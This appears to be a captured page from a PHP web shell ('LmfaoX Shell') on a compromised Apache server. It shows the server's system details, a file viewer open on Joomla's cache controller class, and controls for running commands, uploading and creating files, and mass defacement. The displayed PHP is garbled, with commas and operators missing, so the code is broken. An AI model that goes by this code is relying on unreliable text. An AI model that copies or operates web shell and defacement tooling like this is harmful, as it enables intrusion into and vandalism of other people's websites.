ShellBanner
System:Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686
Software:Apache. PHP/5.3.6-13ubuntu3.10
ID:uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Safe Mode:OFF
Open_Basedir:OFF
Freespace:24.43 GB of 70.42 GB (34.7%)
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

/ http/ yalagina/ libraries/ joomla/ cache/ - drwxr-xr-x

Directory:
Viewing file:     controller.php (4.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package     Joomla.Platform
 * @subpackage  Cache
 *
 * @copyright   Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */

defined('JPATH_PLATFORM') or die;

/**
 * Public cache handler
 *
 * @package     Joomla.Platform
 * @subpackage  Cache
 * @since       11.1
 */
class JCacheController
{
    
/**
     * @var    JCache
     * @since  11.1
     */
    
public $cache;

    
/**
     * @var    array  Array of options
     * @since  11.1
     */
    
public $options;

    
/**
     * Constructor
     *
     * @param   array  $options  Array of options
     *
     * @since   11.1
     */
    
public function __construct($options)
    {
        
$this->cache = new JCache($options);
        
$this->options = & $this->cache->_options;

        
// Overwrite default options with given options
        
foreach ($options as $option => $value)
        {
            if (isset(
$options[$option]))
            {
                
$this->options[$option] = $options[$option];
            }
        }
    }

    
/**
     * Magic method to proxy JCacheControllerMethods
     *
     * @param   string  $name       Name of the function
     * @param   array   $arguments  Array of arguments for the function
     *
     * @return  mixed
     *
     * @since   11.1
     */
    
public function __call($name$arguments)
    {
        
$nazaj call_user_func_array(array($this->cache$name), $arguments);
        return 
$nazaj;
    }

    
/**
     * Returns a reference to a cache adapter object, always creating it
     *
     * @param   string  $type     The cache object type to instantiate; default is output.
     * @param   array   $options  Array of options
     *
     * @return  JCache  A JCache object
     *
     * @since   11.1
     */
    
public static function getInstance($type 'output'$options = array())
    {
        
JCacheController::addIncludePath(JPATH_PLATFORM '/joomla/cache/controller');

        
$type strtolower(preg_replace('/[^A-Z0-9_\.-]/i'''$type));

        
$class 'JCacheController' ucfirst($type);

        if (!
class_exists($class))
        {
            
// Search for the class file in the JCache include paths.
            
jimport('joomla.filesystem.path');

            if (
$path JPath::find(JCacheController::addIncludePath(), strtolower($type) . '.php'))
            {
                include_once 
$path;
            }
            else
            {
                
JError::raiseError(500'Unable to load Cache Controller: ' $type);
            }
        }

        return new 
$class($options);
    }

    
/**
     * Set caching enabled state
     *
     * @param   boolean  $enabled  True to enable caching
     *
     * @return  void
     *
     * @since   11.1
     */
    
public function setCaching($enabled)
    {
        
$this->cache->setCaching($enabled);
    }

    
/**
     * Set cache lifetime
     *
     * @param   integer  $lt  Cache lifetime
     *
     * @return  void
     *
     * @since   11.1
     */
    
public function setLifeTime($lt)
    {
        
$this->cache->setLifeTime($lt);
    }

    
/**
     * Add a directory where JCache should search for controllers. You may
     * either pass a string or an array of directories.
     *
     * @param   string  $path  A path to search.
     *
     * @return  array   An array with directory elements
     *
     * @since   11.1
     */
    
public static function addIncludePath($path '')
    {
        static 
$paths;

        if (!isset(
$paths))
        {
            
$paths = array();
        }
        if (!empty(
$path) && !in_array($path$paths))
        {
            
jimport('joomla.filesystem.path');
            
array_unshift($pathsJPath::clean($path));
        }
        return 
$paths;
    }

    
/**
     * Get stored cached data by id and group
     *
     * @param   string  $id     The cache data id
     * @param   string  $group  The cache data group
     *
     * @return  mixed   False on no result, cached object otherwise
     *
     * @since   11.1
     */
    
public function get($id$group null)
    {
        
$data false;
        
$data $this->cache->get($id$group);

        if (
$data === false)
        {
            
$locktest = new stdClass;
            
$locktest->locked null;
            
$locktest->locklooped null;
            
$locktest $this->cache->lock($id$group);
            if (
$locktest->locked == true && $locktest->locklooped == true)
            {
                
$data $this->cache->get($id$group);
            }
            if (
$locktest->locked == true)
            {
                
$this->cache->unlock($id$group);
            }
        }

        
// Check again because we might get it from second attempt
        
if ($data !== false)
        {
            
$data unserialize(trim($data)); // trim to fix unserialize errors
        
}
        return 
$data;
    }

    
/**
     * Store data to cache by id and group
     *
     * @param   mixed   $data   The data to store
     * @param   string  $id     The cache data id
     * @param   string  $group  The cache data group
     *
     * @return  boolean  True if cache was stored
     *
     * @since   11.1
     */
    
public function store($data$id$group null)
    {
        
$locktest = new stdClass;
        
$locktest->locked null;
        
$locktest->locklooped null;

        
$locktest $this->cache->lock($id$group);

        if (
$locktest->locked == false && $locktest->locklooped == true)
        {
            
$locktest $this->cache->lock($id$group);
        }

        
$sucess $this->cache->store(serialize($data), $id$group);

        if (
$locktest->locked == true)
        {
            
$this->cache->unlock($id$group);
        }

        return 
$sucess;
    }
}
Command:
Quick Commands:
Upload:
[OK] Max size: 100MB
PHP Filesystem: <@ Ú
Search File:
regexp
Create File:
Overwrite [OK]
View File:
Mass Defacement:
[+] Main Directory: [+] Defacement Url:
LmfaoX Shell - Private Build [BETA] - v0.1 -; Generated: 0.1687 seconds